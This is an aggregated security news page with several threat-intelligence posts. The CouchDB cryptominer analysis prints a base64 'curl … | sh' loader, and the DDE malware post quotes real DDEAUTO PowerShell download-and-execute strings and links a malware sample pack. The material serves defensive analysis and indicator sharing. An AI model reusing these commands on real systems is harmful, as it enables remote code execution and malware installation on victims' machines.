Home   Blog   Twitter   Database  

Intel didn't tell CERTS, govs, about Meltdown and Spectre because they couldn't help fix it

Letters to Congress detail the plan to keep CPU flaws secret

Letters sent to the United States Congress by Intel and the other six companies in the Meltdown/Spectre disclosure cabal have revealed how and why they didn't inform the wider world about the dangerous chip design flaws.…

Posted: 23 Feb 2018 | 12:30 am

How one guy could have taken over any Tinder account (but didn’t)

The potential outcome of the Tinder security hole - complete account takeover, with a crook logged in as you

Posted: 22 Feb 2018 | 5:43 am

Vulnerabilities in Apache CouchDB Open the Door to Monero Miners

by Hubert Lin

Attacks abusing cryptocurrency miners have been on an upswing — in large part due to the growing popularity of digital currencies. Based on data from our sensors that we deployed worldwide, we have observed a new attack that exploits two vulnerabilities in a popular database system to deliver miners (detected by Trend Micro as HKTL_COINMINE.GE, HKTL_COINMINE.GP, and HKTL_COINMINE.GQ) for the Monero cryptocurrency. In this instance, Apache CouchDB — an open source database management system designed to combine scalable architecture with an easy-to-use interface — is being targeted.

The two vulnerabilities that we found being exploited are as follows:

Due to differences in CouchDB’s parsers, exploitation of these vulnerabilities can provide attackers with duplicate keys that allow them access control — including administrator rights — within the system. The attackers can then use these functions to execute arbitrary code.

These vulnerabilities were patched back in November 2017.

By default, CouchDB listens to port 5984/TCP. According to our sensors, the peak periods of malicious activity occurred in early February:

 Figure 1: Chart showing the detection of potential attacks. Early February was when the peaks occurred.

Figure 1: Chart showing the detection of potential attacks; early February was when the peaks occurred

Based on the packet traces below, CVE-2017-12635 is first exploited to configure a CouchDB account that has administrator abilities.

 Figure 2: Packet traces we found that show exploitation of CVE-2017-12635

Figure 2: Packet traces we found that show exploitation of CVE-2017-12635

The administrator account is then used for authentication to exploit the remote command execution vulnerability CVE-2017-12636:

 Figure 2: Packet traces we found that show exploitation of CVE-2017-12635

Figure 3: Exploitation of CVE-2017-12636 using the account with administrative rights

In this scenario, the authorization dG9wa2VrMTEyOnRvcGtlazExMg== can be decoded using base64 to the following credentials:

The string Y3VybCBodHRwOi8vOTQuMjUwLjI1My4xNzgvbG9nbzYuanBnfHNo can be decoded using base 64 to a one-liner:

This will download logo6.jpg, which is actually a Bourne shell script that does several actions.

First, it secures the compromised device by killing possible competing mining activities to ensure that the malware is the only cryptocurrency miner in the system. Some examples include the following:

It also downloads and executes the cryptomining executable and configuration:

Furthermore, it keeps persistence on the device by installing scheduled cron jobs:

Vulnerabilities as a Gateway to Cryptocurrency Mining

Cryptocurrencies have taken center stage recently, as prices hit both highs and lows: Bitcoin peaked at US$20,000 in December 2017 and dropped below US$6,000 just over a month later. And they haven’t been gaining attention from mainstream media and users alone — cybercriminals have also taken notice, seeing cryptocurrency mining as a potentially lucrative income source.

This has resulted in the increase of attacks meant to mine cryptocurrencies. What’s more, many of the victims are unaware that their resources are being used, as device slowdowns and sluggishness can often be attributed to causes other than malware or vulnerability exploitation.

Typically, cryptocurrency mining uses a significant amount of computational power and hardware resources to be successful. Due to the difficulty of mining, many attackers try to exploit flaws and vulnerabilities in organizations — where resources are plentiful — to harness their systems and devices.

CouchDB is relatively popular — it ranked 28th out of 300 according to DB-engines rankings of database management systems — and is used by some larger organizations, notably the British Broadcasting Corporation (BBC) for their content platforms. This means that attackers have access to a fairly large active source of resources for their mining operations. However, in our view, the system being targeted is not as important as the existence of vulnerabilities that can be exploited. It does not really matter whether it is CouchDB or other database systems such as MongoDB. As long as there’s a chance to exploit an RCE (remote code execution), the threat actors will take advantage of it. The impact of an RCE vulnerability is that malicious elements run whatever code they want remotely. In this case, an attack using a cryptocurrency miner is a low-risk, potentially high-reward one. As for why CouchDB was targeted, we can surmise that it is due to the existence of the vulnerabilities rather than any special feature that the system provides.

Mitigation and Prevention                                                             

Cryptocurrency miners not only can compromise system performance but also open up organizations and users to a plethora of potential problems, from information theft to even more malware.

Fortunately, the impact of many of these miners can be mitigated through relatively simple steps that are part of standard security best practices.

Trend Micro Solutions

Trend Micro™ XGen™ security provides a cross-generational blend of threat defense techniques against a full range of threats for data centerscloud environmentsnetworks, and endpoints. It features high-fidelity machine learning to secure the gateway and endpoint data and applications, and protects physical, virtual, and cloud workloads. With capabilities like web/URL filtering, behavioral analysis, and custom sandboxing, XGen™ protects against today’s purpose-built threats that bypass traditional controls or exploit known, unknown, or undisclosed vulnerabilities. Smart, optimized, and connected, XGen™ powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.

Trend Micro™ Deep Security protect user systems from any threat that might target the aforementioned vulnerabilities via the following DPI rules:

Trend Micro™ TippingPoint™ customers are protected from threats that might exploit the vulnerabilities via these MainlineDV filters:

Trend Micro™ Smart Home Network customers are protected from this threat via these rules:

Indicators of Compromise (IoCs):

Hash Detected as HKTL_COINMINE.GE

• 63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017

Hash Detected as HKTL_COINMINE.GP

• 8bf1def5479b39376b3790a83380831d288c57dd4fbad8e64abc3a9062eb56bb

Hash Detected as HKTL_COINMINE.GQ

• 5bb66a5e9a7f6c76325a55b7a4a3128fc8631805676bbd3315ce2ac04ac2937b

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

Vulnerabilities in Apache CouchDB Open the Door to Monero Miners

Posted: 15 Feb 2018 | 5:00 am

Comment on Cyberbullying – Where Did It All Start? by person

I’m so sorry for you.

Posted: 5 Feb 2018 | 7:46 am

Deobfuscating PHPJiami

I was sent a PHP script that was protected by PHPJiami which you can find here. PHPJiami is a decent PHP obfuscator that appears to be able to bypass several online deobfuscators. Here’s what the script looks like:

When you run it, you can see what the protected script does.

At the top there’s a comments section. Let me change the uppercase “P” in “PHP” to lowercase.

Now when I run the script, nothing happens. This means there’s some kind of anti-tampering function in the script.

Let me clean up the script so we can see what it’s doing. If you look at the second function, you can see what looks like variable assignments.

At the bottom of the script, you can see a blob of obfuscated text. This is probably where the prize is.

After studying this a bit, I go back up to the second function and echo out the variables to see what they contain (look at the comments). That last line is interesting as it reads a copy of itself.

The section right below that has some interesting variables as well. It looks like it’s using MD5 to ensure the script isn’t modified. If all is good, the blob at the bottom gets uncompressed, rot13’d, etc.

Although I have only have a brief understanding of what the script does, I think I have enough to deobfuscate the blob. Since I cannot modify this script to make it cough up the prize, I can trick it into thinking that the script hasn’t changed by making it read a copy of itself (I call this the “reflection technique”).

Here’s the two changes made to the beautified version.

On the actual script or other PHPJiami scripts, all I do is search for strings that are at the end of the previous line which is ():”; Then put in the reference to the original script. From there, I search for “return” and put an echo there.

When the script is run, I get a result which looks something like this which doesn’t mean too much.

But when you view the source, you can see the original source code.

I just did a quick check to see if anyone else did a deobfuscation write-up and I came across this Chinese site.

It describes a few methods but one technique they offered caught my eye:

If you execute this, you get the deobfuscated script and it’s so easy to do. Might even work on a bunch of other scripts too.

Scroll down to the very bottom and you’ll see a long base64 string. If you decode this, you get the original script which is the same version I got using my, more difficult, reflection technique. Oh wellz.

Always nice to have multiple methods to use since their obfuscation method will probably be upgraded in the future.

Posted: 31 Oct 2017 | 6:36 pm

DDE Command Execution malware samples

Here are a few samples related to the recent DDE Command execution

10/18/2017 InQuest/yara-rules 
10/18/2017 https://twitter.com/i/moments/918126999738175489 
10/18/2017 Inquest: Microsoft Office DDE Macro-less Command Execution Vulnerability
10/18/2017 Inquest: Microsoft Office DDE Vortex Ransomware Targeting Poland
10/16/2017 https://twitter.com/noottrak/status/919975081828261888
10/14/2017 Inquest: Microsoft Office DDE Freddie Mac Targeted Lure 
10/14/2017 Inquest: Microsoft Office DDE SEC OMB Approval Lure
10/12/2017 NViso labs: YARA DDE rules: DDE Command Execution observed in-the-wild 
10/11/2017 Talos:Spoofed SEC Emails Distribute Evolved DNSMessenger 
10/10/2017  NViso labs: MS Office DDE YARA rules
10/09/2017 Sensepost: Macro-less Code Exec in MSWord


 Download. Email me if you need the password  (updated sample pack)

File information
List of available files:
Word documents:


File details with MD5 hashes:
Word documents:
1. bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb EDGAR_Rules.docx
bcadcf65bcf8940fff6fc776dd56563 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://pastebin.com/raw/pxSE2TJ1')) ")

2. 1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428 EDGAR_Rules_2017.docx
 2c0cfdc5b5653cb3e8b0f8eeef55fc32 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://trt.doe.louisiana.gov/fonts.txt')) ")

3 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
8be9633d5023699746936a2b073d2d67 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('');powershell -Command $e. 

4. 9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862 Plantilla - InformesFINAL.docx
78f07a1860ae99c093cc80d31b8bef14 ( DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=new-object -com internetexplorer.application; $e.visible=$true; $e.navigate2(' https://i.ytimg.com/vi/ErLLFVf-0Mw/maxresdefault.jpg '); powershell -e $e " 

5. 7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280 
 aee33500f28791f91c278abb3fcdd942 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://www.filefactory.com/file/2vxfgfitjqrf/Citibk_MT103_Ref71943.exe');powershell -e_

6. 313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065 Giveaway.docx
507784c0796ffebaef7c6fc53f321cd6 (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p://downloads.sixflags-frightfest.com/ticket-ids scrobj.dll" "For Security Reasons")

7. 9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d  Filings_and_Forms.docx
47111e9854db533c328ddbe6e962602a (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object system.net.webclient).downloadstring('http://goo.gl/Gqdihn');powershell.exe -e $e # " "Filings_and_Forms.docx")

8. 8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184 ~WRD0000.tmp

9. 11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13 ~WRD0003.tmp

10. bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 DanePrzesylki17016.doc

Payload Powershell

1. 8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf fonts.txt

2 2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c - powershell script from hxxp://citycarpark.my/components/com_admintools/mscorier

Payload PE

1. 316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea Citibk_MT103_Ref71943.exe

2. 5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f FreddieMacPayload

3. fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 s50.exe  Poland payload

Message information

For the EDGAR campaign

 Received: from usa2.serverhoshbilling.com (usa2.serverhoshbilling.com [])
by m0049925.ppops.net with ESMTP id 2dhb488ej6-1
(version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)
for <snip>; Wed, 11 Oct 2017 00:09:20 -0400
Received: from salesapo by usa2.serverhoshbilling.com with local (Exim 4.89)
(envelope-from <EDGAR@sec.gov>)
id 1e28HE-0001S5-Ew
for <snip>; Wed, 11 Oct 2017 00:05:48 -0400
To: <snip>
Subject: EDGAR Filings
X-PHP-Script: roofingexperts.org/wp-content/themes/sp/examples/send_edgar_corps.php for,
X-PHP-Originating-Script: 658:class.phpmailer.php
Date: Wed, 11 Oct 2017 04:05:48 +0000
From: EDGAR <EDGAR@sec.gov>
Reply-To: EDGAR <EDGAR@sec.gov>
Message-ID: <7608a3de5fe6c9bf7df6782a8aa9790f@roofingexperts.org>
X-Mailer: PHPMailer 5.2.22 (https://github.com/PHPMailer/PHPMailer)
MIME-Version: 1.0
Content-Type: multipart/mixed;
Content-Transfer-Encoding: 8bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - usa2.serverhoshbilling.com
X-AntiAbuse: Original Domain - nu.com
X-AntiAbuse: Originator/Caller UID/GID - [658 497] / [47 12]
X-AntiAbuse: Sender Address Domain - sec.gov
X-Get-Message-Sender-Via: usa2.serverhoshbilling.com: authenticated_id: salesapo/only user confirmed/virtual account not confirmed
X-Authenticated-Sender: usa2.serverhoshbilling.com: salesapo
X-Source: /opt/cpanel/ea-php56/root/usr/bin/lsphp
X-Source-Args: lsphp:ntent/themes/sp/examples/send_edgar_corps.php
X-Source-Dir: salesapogee.com:/roofingexperts/wp-content/themes/sp/examples
X-CLX-Shades: Junk
X-CLX-Response: <snip>
X-Proofpoint-Virus-Version: vendor=fsecure engine=2.50.10432:,, definitions=2017-10-10_08:,,
X-Proofpoint-Spam-Details: rule=spam policy=default score=99 priorityscore=1501 malwarescore=0
 suspectscore=0 phishscore=0 bulkscore=0 spamscore=0 clxscore=-262
 lowpriorityscore=0 impostorscore=0 adultscore=0 classifier=clx:Junk
 adjust=0 reason=mlx scancount=1 engine=8.0.1-1707230000

This is a multi-part message in MIME format.

Content-Type: multipart/alternative;

Content-Type: text/plain; charset=us-ascii

Important information about last changes in EDGAR Filings

Content-Type: text/html; charset=us-ascii

<b>Important information about last changes in EDGAR Filings</b><br/><br/>Attached document is directed to <snip>


Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document; name="EDGAR_Rules_2017.docx"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=EDGAR_Rules_2017.docx



for 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx

Received: from VI1PR08MB2670.eurprd08.prod.outlook.com ( by
 AM4PR08MB2659.eurprd08.prod.outlook.com ( with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id via Mailbox Transport; Thu, 12 Oct 2017 10:45:16 +0000
Received: from DB6PR0802MB2600.eurprd08.prod.outlook.com ( by
 VI1PR08MB2670.eurprd08.prod.outlook.com ( with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id; Thu, 12 Oct 2017 10:45:15 +0000
Received: from VI1PR0802CA0047.eurprd08.prod.outlook.com
 (2603:10a6:800:a9::33) by DB6PR0802MB2600.eurprd08.prod.outlook.com
 (2603:10a6:4:a2::17) with Microsoft SMTP Server (version=TLS1_2,
 cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id; Thu, 12 Oct
 2017 10:45:14 +0000
Received: from DB3FFO11FD006.protection.gbl (2a01:111:f400:7e04::133) by
 VI1PR0802CA0047.outlook.office365.com (2603:10a6:800:a9::33) with Microsoft
 SMTP Server (version=TLS1_2,
 cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id via Frontend
 Transport; Thu, 12 Oct 2017 10:45:14 +0000
Received: from za-hybrid.mail.standardbank.com ( by
 DB3FFO11FD006.mail.protection.outlook.com ( with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384) id via Frontend Transport; Thu, 12 Oct 2017 10:45:12 +0000
Received: from <snip> ( by
 <snip>( with Microsoft SMTP
 Server (TLS) id 14.3.339.0; Thu, 12 Oct 2017 12:44:35 +0200
Received: from <snip> ( by
 <snip> with Microsoft SMTP Server
 id 8.3.389.2; Thu, 12 Oct 2017 11:43:42 +0100
Received: from cluster-a.mailcontrol.com (unknown []) by
 Forcepoint Email with ESMTPS id AC3EDEB6D852BD348649; Thu, 12 Oct 2017
 11:43:38 +0100 (CET)
Received: from rly14a.srv.mailcontrol.com (localhost []) by
 rly14a.srv.mailcontrol.com (MailControl) with ESMTP id v9CAhaCs039950; Thu,
 12 Oct 2017 11:43:36 +0100
Received: from localhost.localdomain (localhost.localdomain []) by
 rly14a.srv.mailcontrol.com (MailControl) id v9CAhaRp039947; Thu, 12 Oct 2017
 11:43:36 +0100
Received: from mx1.ssl-secure-mail.com (mx1.ssl-secure-mail.com
 []) by rly14a-eth0.srv.mailcontrol.com (envelope-sender
 <Emmanuel.Chatta@stadnardbank.co.za>) (MIMEDefang) with ESMTP id
 v9CAhZoc039719 (TLS bits=256 verify=NO); Thu, 12 Oct 2017 11:43:36 +0100
Received: from authenticated-user (mx1.ssl-secure-mail.com [])
(using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits)) (No client
 certificate requested) by mx1.ssl-secure-mail.com (Postfix) with ESMTPSA id
 571CD1511D4; Thu, 12 Oct 2017 06:43:35 -0400 (EDT)
From: Emmanuel Chatta <Emmanuel.Chatta@stadnardbank.co.za>
To: <snip>
Subject: Document
Thread-Topic: Document
Thread-Index: AQHTQ0cx2UbfjWEaCEK0bdQsLAkUYA==
Date: Thu, 12 Oct 2017 10:43:35 +0000
Message-ID: <f8c34a32397e02274fd65930045f0204@ssl-secure-mail.com>
Content-Language: en-US
X-MS-Exchange-Organization-AuthSource: <snip>
X-MS-Has-Attach: yes
received-spf: Fail (protection.outlook.com: domain of <snip> does
 not designate as permitted sender)
 receiver=protection.outlook.com; client-ip=;
x-scanned-by: MailControl 44278.1987 (www.mailcontrol.com) on
x-mailcontrol-inbound: 4HEeExWtV!H1jiRXZJTT7wjEcFneOidAa+WVdv9sScH43ayzJcnLn4fvVkSq3YGx
x-ms-publictraffictype: Email
X-Microsoft-Exchange-Diagnostics: 1;AM4PR08MB2659;27:42C8MVC/6E4KnuK79xnDQihs/aWUnFSYSvMpUq/ZWFgliSK+uNXwEUaalqg0K4Ukdn7mPjI/6bOflK6H4WqZhQpH28iVAkhECXI6saRJPgqIf8Vn6JKx/rSyKhnUCz+c
Content-Type: multipart/mixed;
MIME-Version: 1.0

Posted: 18 Oct 2017 | 6:33 am

Stepping up security for an Internet-of-Things World

The optimistic outlook is that the internet of things will be an enabling technology that will help make the people and physical systems of the world — health care, food production, transportation, energy consumption — smarter and more efficient.

The pessimistic outlook? Hackers will have something else to hack. And consumers accustomed to adding security tools to their computers and phones should expect to adopt similar precautions with internet-connected home appliances.

“If we want to put networked technologies into more and more things, we also have to find a way to make them safer,” said Michael Walker, a program manager and computer security expert at the Pentagon’s advanced research arm. “It’s a challenge for civilization.”

To help address that challenge, Mr. Walker and the Defense Advanced Research Projects Agency, or Darpa, created a contest with millions of dollars in prize money, called the Cyber Grand Challenge. To win, contestants would have to create automated digital defense systems that could identify and fix software vulnerabilities on their own — essentially smart software robots as sentinels for digital security.

A reminder of the need for stepped-up security came a few weeks after the Darpa-sponsored competition, which was held in August. Researchers for Level 3 Communications, a telecommunications company, said they had detected several strains of malware that launched attacks on websites from compromised internet-of-things devices.

Read the full article at The New York Times.

The post Stepping up security for an Internet-of-Things World appeared first on CyberESI.

Posted: 18 Oct 2016 | 7:42 am

Freedome VPN For Mac OS X

Take a look at this:

F-Secure Freedome Mac OS X

F-Secure Freedome for OS X (freshly installed on a Labs Mac Team MacBook).


The beta is now open for everyone to try for 60 days at no cost.

Download or share.

On 24/04/15 At 12:37 PM

Posted: 24 Apr 2015 | 1:37 am